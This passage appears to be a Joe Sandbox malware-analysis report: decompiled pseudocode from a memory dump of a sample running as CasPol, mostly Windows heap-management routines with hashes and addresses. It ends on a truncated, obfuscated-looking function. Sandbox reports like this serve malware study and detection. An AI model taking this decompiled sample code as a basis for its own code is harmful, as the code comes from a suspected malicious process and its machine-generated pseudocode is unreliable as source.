													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x146fcfb) & 0x000000ff) * 4 +  &M0146FCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E0147A80D(_t168);
				}
				return E0140D0D1(_t98);
			}


























                                                                        0x0146fa2b
                                                                        0x0146fa2b
                                                                        0x0146fa2d
                                                                        0x0146fa32
                                                                        0x0146fa37
                                                                        0x0146fa3a
                                                                        0x0146fa3c
                                                                        0x0146fa43
                                                                        0x0146fa46
                                                                        0x0146fa49
                                                                        0x0146fa4f
                                                                        0x0146fa55
                                                                        0x0146fa58
                                                                        0x0146fa5d
                                                                        0x0146fa65
                                                                        0x0146fa6d
                                                                        0x0146fa72
                                                                        0x0146fa78
                                                                        0x0146fa7e
                                                                        0x0146fa8c
                                                                        0x0146faa2
                                                                        0x0146faa7
                                                                        0x0146faaa
                                                                        0x0146faaf
                                                                        0x0146fac4
                                                                        0x0146fab1
                                                                        0x0146fac0
                                                                        0x0146fac0
                                                                        0x0146fac8
                                                                        0x0146facb
                                                                        0x0146fad5
                                                                        0x0146fadb
                                                                        0x0146fae1
                                                                        0x0146fb05
                                                                        0x0146fb05
                                                                        0x0146fb08
                                                                        0x0146fb0b
                                                                        0x0146fb15
                                                                        0x0146fb98
                                                                        0x0146fb9f
                                                                        0x0146fba5
                                                                        0x0146fbb4
                                                                        0x0146fbb6
                                                                        0x0146fbb7
                                                                        0x0146fbbd
                                                                        0x00000000
                                                                        0x0146fbbd
                                                                        0x0146fb17
                                                                        0x0146fb17
                                                                        0x0146fb17
                                                                        0x0146fb1a
                                                                        0x0146fb22
                                                                        0x0146fb40
                                                                        0x0146fb47
                                                                        0x0146fb4c
                                                                        0x0146fb4e
                                                                        0x0146fb54
                                                                        0x0146fb5a
                                                                        0x0146fb5a
                                                                        0x0146fb60
                                                                        0x0146fb66
                                                                        0x0146fb6d
                                                                        0x0146fb70
                                                                        0x0146fb73
                                                                        0x0146fb78
                                                                        0x0146fb7d
                                                                        0x0146fb8c
                                                                        0x0146fb90
                                                                        0x0146fbbf
                                                                        0x0146fbbf
                                                                        0x0146fbc6
                                                                        0x0146fbcd
                                                                        0x0146fc18
                                                                        0x0146fc18
                                                                        0x0146fc23
                                                                        0x0146fc3d
                                                                        0x0146fc3d
                                                                        0x0146fc25
                                                                        0x0146fc25
                                                                        0x0146fc2b
                                                                        0x0146fc2d
                                                                        0x0146fc33
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fc33
                                                                        0x0146fbcf
                                                                        0x0146fbd9
                                                                        0x0146fbdf
                                                                        0x0146fc00
                                                                        0x0146fc06
                                                                        0x0146fbe1
                                                                        0x0146fbe1
                                                                        0x0146fbe3
                                                                        0x0146fbe9
                                                                        0x0146fbf5
                                                                        0x0146fbeb
                                                                        0x0146fbee
                                                                        0x0146fbf0
                                                                        0x0146fbf0
                                                                        0x0146fbf7
                                                                        0x0146fbfb
                                                                        0x0146fc09
                                                                        0x0146fc10
                                                                        0x0146fc16
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fc16
                                                                        0x0146fbcd
                                                                        0x0146fb7d
                                                                        0x0146fb60
                                                                        0x0146fb54
                                                                        0x0146fb22
                                                                        0x0146fae3
                                                                        0x0146fae3
                                                                        0x0146faed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146faed
                                                                        0x0146fae1
                                                                        0x0146fad5
                                                                        0x0146fa8c
                                                                        0x0146fc44
                                                                        0x0146fc72
                                                                        0x0146fc7c
                                                                        0x0146fc82
                                                                        0x0146fc82
                                                                        0x0146fc84
                                                                        0x0146fc8a
                                                                        0x0146fcca
                                                                        0x0146fcca
                                                                        0x0146fccb
                                                                        0x0146fccc
                                                                        0x0146fccf
                                                                        0x0146fcd0
                                                                        0x00000000
                                                                        0x0146fc8c
                                                                        0x0146fc93
                                                                        0x00000000
                                                                        0x0146fc9a
                                                                        0x0146fc9b
                                                                        0x0146fc9c
                                                                        0x0146fc9f
                                                                        0x0146fca0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fca4
                                                                        0x0146fca5
                                                                        0x0146fca6
                                                                        0x0146fca9
                                                                        0x0146fcaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fcae
                                                                        0x0146fcaf
                                                                        0x0146fcb0
                                                                        0x0146fcb2
                                                                        0x0146fcb3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fcb7
                                                                        0x0146fcb8
                                                                        0x0146fcb9
                                                                        0x0146fcbc
                                                                        0x0146fcbd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fcc1
                                                                        0x0146fcc2
                                                                        0x0146fcc3
                                                                        0x0146fcc5
                                                                        0x0146fcc6
                                                                        0x0146fcd2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146fc93
                                                                        0x0146fcd3
                                                                        0x0146fcd5
                                                                        0x0146fcd5
                                                                        0x0146fcdf

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99e09598d9f91a43cd9e1d3672cf5c67c5ec58387f25b3b437adda697bba4242
                                                                        • Instruction ID: 78d3e055cb73809972aec760abdfdc65625fc5ccedbbe90d142e8ba2018218a3
                                                                        • Opcode Fuzzy Hash: 99e09598d9f91a43cd9e1d3672cf5c67c5ec58387f25b3b437adda697bba4242
                                                                        • Instruction Fuzzy Hash: 0F819EB09002059FDB18CF59D4606BEFBF5FB08308F14815BE985AB3A5D334988ACF65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147DBD2 Relevance: .2, Instructions: 212COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0147DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x14a6114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L0147D016(_t119, _t183, _t119, _t78);
									E013CFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E0147C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x139aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E013CFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E0147E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x139aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E013FD340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E0147D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E0147D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E0147A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                                                                        0x0147dbdc
                                                                        0x0147dbde
                                                                        0x0147dbe1
                                                                        0x0147dbed
                                                                        0x0147dbef
                                                                        0x0147dbf7
                                                                        0x0147dbfd
                                                                        0x0147dc00
                                                                        0x0147dc04
                                                                        0x0147dc07
                                                                        0x0147dc0c
                                                                        0x0147dd1f
                                                                        0x0147dd1f
                                                                        0x0147dd23
                                                                        0x0147dd26
                                                                        0x0147dd29
                                                                        0x0147dd29
                                                                        0x0147dd2c
                                                                        0x0147dd32
                                                                        0x0147dd35
                                                                        0x00000000
                                                                        0x0147dd38
                                                                        0x0147dd3a
                                                                        0x0147dd5d
                                                                        0x0147dd63
                                                                        0x0147dd69
                                                                        0x0147dd6e
                                                                        0x0147dd71
                                                                        0x0147dd78
                                                                        0x0147dd7d
                                                                        0x0147dd8c
                                                                        0x0147dd9e
                                                                        0x0147dda0
                                                                        0x0147ddad
                                                                        0x0147ddb0
                                                                        0x0147ddb5
                                                                        0x0147ddb9
                                                                        0x0147ddd9
                                                                        0x0147ddd9
                                                                        0x0147ddde
                                                                        0x0147dde0
                                                                        0x0147dde3
                                                                        0x0147dde5
                                                                        0x0147dde9
                                                                        0x0147dde9
                                                                        0x0147ddee
                                                                        0x0147ddf6
                                                                        0x0147ddf6
                                                                        0x0147dd97
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147dd9b
                                                                        0x00000000
                                                                        0x0147dd9b
                                                                        0x0147dd7f
                                                                        0x00000000
                                                                        0x0147dd7f
                                                                        0x0147dd3f
                                                                        0x0147dd54
                                                                        0x0147dd58
                                                                        0x0147dd86
                                                                        0x00000000
                                                                        0x0147dd86
                                                                        0x00000000
                                                                        0x0147dd5a
                                                                        0x0147dd5a
                                                                        0x0147dd5a
                                                                        0x00000000
                                                                        0x0147dd5a
                                                                        0x0147dd3f
                                                                        0x0147dd38
                                                                        0x0147dc12
                                                                        0x0147dc15
                                                                        0x0147dc25
                                                                        0x0147dc31
                                                                        0x0147dc34
                                                                        0x0147dc3b
                                                                        0x0147dc3e
                                                                        0x0147dc40
                                                                        0x0147dc43
                                                                        0x0147dc46
                                                                        0x0147dc62
                                                                        0x0147dc6b
                                                                        0x0147dc6d
                                                                        0x0147dc48
                                                                        0x0147dc4b
                                                                        0x0147dc59
                                                                        0x0147dc5c
                                                                        0x0147dc5c
                                                                        0x0147dc72
                                                                        0x0147dc78
                                                                        0x0147dc7f
                                                                        0x0147dc81
                                                                        0x0147dc81
                                                                        0x0147dc84
                                                                        0x0147dc88
                                                                        0x0147dc8d
                                                                        0x0147dc95
                                                                        0x0147dc9b
                                                                        0x0147dca0
                                                                        0x0147dca2
                                                                        0x0147dca6
                                                                        0x0147dca6
                                                                        0x0147dcb0
                                                                        0x0147dcd1
                                                                        0x0147dcd4
                                                                        0x0147dcda
                                                                        0x0147dcec
                                                                        0x0147dcf1
                                                                        0x0147dcf6
                                                                        0x0147dd0c
                                                                        0x0147dd1a
                                                                        0x0147dd1a
                                                                        0x0147dcf6
                                                                        0x00000000
                                                                        0x0147dcda
                                                                        0x0147dcb5
                                                                        0x0147dcb6
                                                                        0x0147dcc5
                                                                        0x0147dcca
                                                                        0x0147dcca

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8988a464298d7981a10d7b49358efac135013d46f35c0634536beab98a54daf4
                                                                        • Instruction ID: 54dfe7f79870dfa3adfc6cdc4b8953bb11edf0b83ac62f7f18a82bf6bb9e7a38
                                                                        • Opcode Fuzzy Hash: 8988a464298d7981a10d7b49358efac135013d46f35c0634536beab98a54daf4
                                                                        • Instruction Fuzzy Hash: 9C712975E1012A9FCB14DFA9C8809FFBBF1EF88210B15416AE955EB394D634C946CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014828EC Relevance: .2, Instructions: 211COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E014828EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E013D2280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x14a6110; // 0x6fc0a953
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x14a6110; // 0x6fc0a953
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E014825DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E013CFFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x14a6110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E01482506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E013CFFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E013FFA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E0147A80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E013CFFB0(_t115, _t145, _t147);
							}
							_t104 = E01483149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E013D2280(_t104, _t147);
								}
								_v5 = 0xff;
								E01482876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}











































                                                                        0x014828f5
                                                                        0x014828fa
                                                                        0x014828fe
                                                                        0x01482900
                                                                        0x01482906
                                                                        0x01482908
                                                                        0x01482908
                                                                        0x0148290e
                                                                        0x01482915
                                                                        0x01482918
                                                                        0x0148291b
                                                                        0x0148291d
                                                                        0x01482920
                                                                        0x01482920
                                                                        0x01482929
                                                                        0x0148292c
                                                                        0x0148292f
                                                                        0x01482932
                                                                        0x01482935
                                                                        0x01482938
                                                                        0x0148293d
                                                                        0x0148293d
                                                                        0x01482940
                                                                        0x01482944
                                                                        0x01482944
                                                                        0x01482948
                                                                        0x0148294a
                                                                        0x01482950
                                                                        0x01482953
                                                                        0x01482958
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148295a
                                                                        0x01482962
                                                                        0x01482965
                                                                        0x01482976
                                                                        0x01482978
                                                                        0x014829e0
                                                                        0x014829e4
                                                                        0x014829e6
                                                                        0x014829e8
                                                                        0x014829eb
                                                                        0x01482993
                                                                        0x01482993
                                                                        0x00000000
                                                                        0x01482993
                                                                        0x014829ed
                                                                        0x014829ef
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014829f1
                                                                        0x00000000
                                                                        0x014829f1
                                                                        0x0148297a
                                                                        0x0148299b
                                                                        0x0148299d
                                                                        0x014829f5
                                                                        0x014829fb
                                                                        0x014829fb
                                                                        0x01482a00
                                                                        0x01482a04
                                                                        0x01482a04
                                                                        0x01482a06
                                                                        0x01482a13
                                                                        0x01482a13
                                                                        0x01482a18
                                                                        0x01482a44
                                                                        0x01482a44
                                                                        0x01482a44
                                                                        0x01482a46
                                                                        0x01482a50
                                                                        0x01482a5a
                                                                        0x01482a5e
                                                                        0x01482a99
                                                                        0x01482a9e
                                                                        0x01482aa0
                                                                        0x01482a70
                                                                        0x01482a70
                                                                        0x01482a72
                                                                        0x01482a75
                                                                        0x01482a82
                                                                        0x01482a89
                                                                        0x01482a89
                                                                        0x01482a7a
                                                                        0x01482a7f
                                                                        0x01482a7f
                                                                        0x01482a7f
                                                                        0x00000000
                                                                        0x01482a7f
                                                                        0x01482aa4
                                                                        0x01482aa4
                                                                        0x01482ab6
                                                                        0x01482abd
                                                                        0x01482ac0
                                                                        0x01482ac4
                                                                        0x01482ac6
                                                                        0x01482ac9
                                                                        0x01482acf
                                                                        0x01482ad1
                                                                        0x01482ad3
                                                                        0x01482ad3
                                                                        0x01482ad3
                                                                        0x01482acf
                                                                        0x01482ad6
                                                                        0x01482ad9
                                                                        0x01482adb
                                                                        0x01482add
                                                                        0x01482af9
                                                                        0x01482af9
                                                                        0x01482aff
                                                                        0x01482adf
                                                                        0x01482adf
                                                                        0x01482ae7
                                                                        0x01482aea
                                                                        0x01482aef
                                                                        0x01482af4
                                                                        0x01482af4
                                                                        0x01482b01
                                                                        0x01482b05
                                                                        0x01482b08
                                                                        0x01482b08
                                                                        0x01482b0d
                                                                        0x01482b11
                                                                        0x01482b1b
                                                                        0x01482b20
                                                                        0x00000000
                                                                        0x01482b11
                                                                        0x01482a60
                                                                        0x01482a61
                                                                        0x01482a6b
                                                                        0x00000000
                                                                        0x01482a6b
                                                                        0x01482a1f
                                                                        0x01482a25
                                                                        0x01482a25
                                                                        0x01482a27
                                                                        0x01482a38
                                                                        0x01482a3d
                                                                        0x01482a3d
                                                                        0x01482a3f
                                                                        0x01482a3f
                                                                        0x00000000
                                                                        0x01482a3f
                                                                        0x01482a2c
                                                                        0x01482a2c
                                                                        0x01482a31
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01482a36
                                                                        0x01482a36
                                                                        0x00000000
                                                                        0x01482a36
                                                                        0x01482a0c
                                                                        0x00000000
                                                                        0x01482a0c
                                                                        0x014829a1
                                                                        0x014829a4
                                                                        0x014829a4
                                                                        0x014829b0
                                                                        0x014829b5
                                                                        0x014829b9
                                                                        0x00000000
                                                                        0x014829bf
                                                                        0x014829c3
                                                                        0x014829c6
                                                                        0x014829c6
                                                                        0x014829cd
                                                                        0x014829d3
                                                                        0x014829d8
                                                                        0x00000000
                                                                        0x014829d8
                                                                        0x014829b9
                                                                        0x01482980
                                                                        0x01482983
                                                                        0x01482990
                                                                        0x00000000
                                                                        0x01482989
                                                                        0x01482989
                                                                        0x0148298c
                                                                        0x0148298c
                                                                        0x01482995
                                                                        0x01482995
                                                                        0x01482999
                                                                        0x01482999
                                                                        0x00000000
                                                                        0x01482999

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07e19e93b3ca7e12c7177c6bdfad2511c246010ffd4fcc07f1aedf7b652082a5
                                                                        • Instruction ID: 618b6a2665f39105770534b96e3429905c75c527a6005249baf29ea5ab9364b4
                                                                        • Opcode Fuzzy Hash: 07e19e93b3ca7e12c7177c6bdfad2511c246010ffd4fcc07f1aedf7b652082a5
                                                                        • Instruction Fuzzy Hash: C071F431A0010A9BDB15EF6DC880A7FFBE6EF58350F14816AE915D73A1DBB4D942C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00423220 Relevance: .2, Instructions: 209COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00423220() {
				signed int _t32;
				signed int _t33;
				signed int _t34;
				void* _t39;
				signed char _t42;
				signed int _t44;
				signed char _t47;
				void* _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t66;

				_t33 = _t32 & 0x853fd4e9;
				asm("das");
				asm("rol dword [0xd918f40f], 0x70");
				asm("adc ebp, [0x35beec61]");
				_t62 = _t61 ^  *0x77b439ce;
